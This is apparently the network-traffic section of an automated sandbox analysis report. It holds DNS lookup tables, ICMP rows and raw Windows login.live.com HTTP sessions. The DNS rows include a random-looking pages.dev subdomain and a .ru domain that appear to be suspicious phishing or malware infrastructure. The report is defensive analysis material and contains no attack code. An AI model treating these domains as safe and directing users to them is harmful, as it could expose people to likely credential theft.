                                                                Aug 27, 2024 20:03:41.604316950 CEST53505671.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:41.607583046 CEST53519031.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:41.705634117 CEST5270953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:41.705831051 CEST5782953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:41.712846994 CEST53527091.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:41.713043928 CEST53578291.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:42.462332010 CEST6401653192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:42.462462902 CEST5003153192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:42.471836090 CEST53640161.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:42.472316980 CEST53500311.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:42.534837961 CEST6487953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:42.535064936 CEST6209253192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:42.542027950 CEST53648791.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:42.542227983 CEST53620921.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:45.987472057 CEST53519751.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:04:04.842722893 CEST53598891.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:04:16.376163006 CEST138138192.168.2.16192.168.2.255
                                                                Aug 27, 2024 20:04:27.422708988 CEST53626781.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:04:27.754584074 CEST53587371.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:04:55.622638941 CEST53528091.1.1.1192.168.2.16
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Aug 27, 2024 20:03:30.177027941 CEST192.168.2.161.1.1.1c25a(Port unreachable)Destination Unreachable
                                                                Aug 27, 2024 20:03:32.660957098 CEST192.168.2.161.1.1.1c25a(Port unreachable)Destination Unreachable
                                                                Aug 27, 2024 20:03:38.376060009 CEST192.168.2.161.1.1.1c23a(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Aug 27, 2024 20:03:27.906917095 CEST192.168.2.161.1.1.10xb3faStandard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:27.907135963 CEST192.168.2.161.1.1.10xf8d8Standard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.762990952 CEST192.168.2.161.1.1.10x717fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.763134003 CEST192.168.2.161.1.1.10x2fdfStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.765166044 CEST192.168.2.161.1.1.10x751dStandard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.765305996 CEST192.168.2.161.1.1.10x3f7aStandard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.579299927 CEST192.168.2.161.1.1.10x7833Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.579627037 CEST192.168.2.161.1.1.10xdb1eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.252192020 CEST192.168.2.161.1.1.10xa184Standard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.252829075 CEST192.168.2.161.1.1.10xd891Standard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.583076000 CEST192.168.2.161.1.1.10x3d1bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.583235025 CEST192.168.2.161.1.1.10xa9cfStandard query (0)www.google.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.088407993 CEST192.168.2.161.1.1.10xffc1Standard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.088576078 CEST192.168.2.161.1.1.10x6793Standard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.807626963 CEST192.168.2.161.1.1.10x1dfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.807802916 CEST192.168.2.161.1.1.10xcac6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.813282013 CEST192.168.2.161.1.1.10x8034Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.813455105 CEST192.168.2.161.1.1.10x364fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.135056019 CEST192.168.2.161.1.1.10x6a20Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.135198116 CEST192.168.2.161.1.1.10x2e70Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.247483015 CEST192.168.2.161.1.1.10x4fa3Standard query (0)glansaolksnu.ruA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.247659922 CEST192.168.2.161.1.1.10xdefeStandard query (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.425673962 CEST192.168.2.161.1.1.10xc92dStandard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.425941944 CEST192.168.2.161.1.1.10x40eeStandard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.595076084 CEST192.168.2.161.1.1.10xa919Standard query (0)glansaolksnu.ruA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.595263958 CEST192.168.2.161.1.1.10x5527Standard query (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.705634117 CEST192.168.2.161.1.1.10x5bb3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.705831051 CEST192.168.2.161.1.1.10x5aaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.462332010 CEST192.168.2.161.1.1.10xd344Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.462462902 CEST192.168.2.161.1.1.10x5164Standard query (0)code.jquery.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.534837961 CEST192.168.2.161.1.1.10x121fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.535064936 CEST192.168.2.161.1.1.10xeb63Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Aug 27, 2024 20:03:28.353746891 CEST1.1.1.1192.168.2.160xb3faNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:28.353746891 CEST1.1.1.1192.168.2.160xb3faNo error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:28.354655027 CEST1.1.1.1192.168.2.160xf8d8No error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.771692991 CEST1.1.1.1192.168.2.160x717fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.771692991 CEST1.1.1.1192.168.2.160x717fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.771996021 CEST1.1.1.1192.168.2.160x2fdfNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.773372889 CEST1.1.1.1192.168.2.160x751dNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:29.773372889 CEST1.1.1.1192.168.2.160x751dNo error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.176935911 CEST1.1.1.1192.168.2.160x3f7aNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.586605072 CEST1.1.1.1192.168.2.160x7833No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.586605072 CEST1.1.1.1192.168.2.160x7833No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:30.586618900 CEST1.1.1.1192.168.2.160xdb1eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.260991096 CEST1.1.1.1192.168.2.160xa184No error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.260991096 CEST1.1.1.1192.168.2.160xa184No error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.591114998 CEST1.1.1.1192.168.2.160x3d1bNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.591131926 CEST1.1.1.1192.168.2.160xa9cfNo error (0)www.google.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:32.660881996 CEST1.1.1.1192.168.2.160xd891No error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.097657919 CEST1.1.1.1192.168.2.160x6793No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.100724936 CEST1.1.1.1192.168.2.160xffc1No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.47.111A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.100724936 CEST1.1.1.1192.168.2.160xffc1No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.44.145A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.815469027 CEST1.1.1.1192.168.2.160x1dfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.815469027 CEST1.1.1.1192.168.2.160x1dfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.815485001 CEST1.1.1.1192.168.2.160xcac6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.821399927 CEST1.1.1.1192.168.2.160x8034No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.821399927 CEST1.1.1.1192.168.2.160x8034No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:36.821424007 CEST1.1.1.1192.168.2.160x364fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.142369986 CEST1.1.1.1192.168.2.160x6a20No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.142369986 CEST1.1.1.1192.168.2.160x6a20No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.142384052 CEST1.1.1.1192.168.2.160x2e70No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.340138912 CEST1.1.1.1192.168.2.160x4fa3No error (0)glansaolksnu.ru104.21.51.138A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.340138912 CEST1.1.1.1192.168.2.160x4fa3No error (0)glansaolksnu.ru172.67.181.39A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.375926971 CEST1.1.1.1192.168.2.160xdefeNo error (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.439069986 CEST1.1.1.1192.168.2.160xc92dNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.47.111A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.439069986 CEST1.1.1.1192.168.2.160xc92dNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.44.145A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:38.439085960 CEST1.1.1.1192.168.2.160x40eeNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.604316950 CEST1.1.1.1192.168.2.160xa919No error (0)glansaolksnu.ru172.67.181.39A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.604316950 CEST1.1.1.1192.168.2.160xa919No error (0)glansaolksnu.ru104.21.51.138A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.607583046 CEST1.1.1.1192.168.2.160x5527No error (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.712846994 CEST1.1.1.1192.168.2.160x5bb3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.712846994 CEST1.1.1.1192.168.2.160x5bb3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.712846994 CEST1.1.1.1192.168.2.160x5bb3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:41.712846994 CEST1.1.1.1192.168.2.160x5bb3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.471836090 CEST1.1.1.1192.168.2.160xd344No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.471836090 CEST1.1.1.1192.168.2.160xd344No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.471836090 CEST1.1.1.1192.168.2.160xd344No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.471836090 CEST1.1.1.1192.168.2.160xd344No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:03:42.542027950 CEST1.1.1.1192.168.2.160x121fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                • login.live.com
                                                                • fs.microsoft.com
                                                                • slscr.update.microsoft.com
                                                                • www.estampariaimagemeacao.com.br
                                                                • cdnjs.cloudflare.com
                                                                • https:
                                                                  • ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                  • challenges.cloudflare.com
                                                                  • glansaolksnu.ru
                                                                  • code.jquery.com
                                                                • a.nel.cloudflare.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.164970240.126.31.73443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:15 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                Connection: Keep-Alive
                                                                Content-Type: application/soap+xml
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                Content-Length: 3592
                                                                Host: login.live.com
                                                                2024-08-27 18:03:15 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                2024-08-27 18:03:16 UTC569INHTTP/1.1 200 OK
                                                                Cache-Control: no-store, no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                Expires: Tue, 27 Aug 2024 18:02:15 GMT
                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C538_SN1
                                                                x-ms-request-id: 6c5b6c66-88a3-4cb7-af66-189d8b99bbb7
                                                                PPServer: PPV: 30 H: SN1PEPF00040191 V: 0
                                                                X-Content-Type-Options: nosniff
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-XSS-Protection: 1; mode=block
                                                                Date: Tue, 27 Aug 2024 18:03:15 GMT
                                                                Connection: close
                                                                Content-Length: 11389
                                                                2024-08-27 18:03:16 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.164970340.126.31.73443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:16 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                Connection: Keep-Alive
                                                                Content-Type: application/soap+xml
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                Content-Length: 4775
                                                                Host: login.live.com
                                                                2024-08-27 18:03:16 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                2024-08-27 18:03:17 UTC569INHTTP/1.1 200 OK
                                                                Cache-Control: no-store, no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                Expires: Tue, 27 Aug 2024 18:02:17 GMT
                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C538_SN1
                                                                x-ms-request-id: 73c49f73-9574-4af2-ad4d-fb07c8625a6e
                                                                PPServer: PPV: 30 H: SN1PEPF00040169 V: 0
                                                                X-Content-Type-Options: nosniff
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-XSS-Protection: 1; mode=block
                                                                Date: Tue, 27 Aug 2024 18:03:16 GMT
                                                                Connection: close
                                                                Content-Length: 11369
                                                                2024-08-27 18:03:17 UTC11369INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.164970540.126.31.73443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:18 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                Connection: Keep-Alive
                                                                Content-Type: application/soap+xml
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                Content-Length: 4775
                                                                Host: login.live.com
                                                                2024-08-27 18:03:18 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                2024-08-27 18:03:18 UTC569INHTTP/1.1 200 OK
                                                                Cache-Control: no-store, no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                Expires: Tue, 27 Aug 2024 18:02:18 GMT
                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C538_BAY
                                                                x-ms-request-id: ca662f94-2235-4a18-8c90-5aecda2cd336
                                                                PPServer: PPV: 30 H: PH1PEPF00018377 V: 0
                                                                X-Content-Type-Options: nosniff
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-XSS-Protection: 1; mode=block
                                                                Date: Tue, 27 Aug 2024 18:03:18 GMT
                                                                Connection: close
                                                                Content-Length: 11409
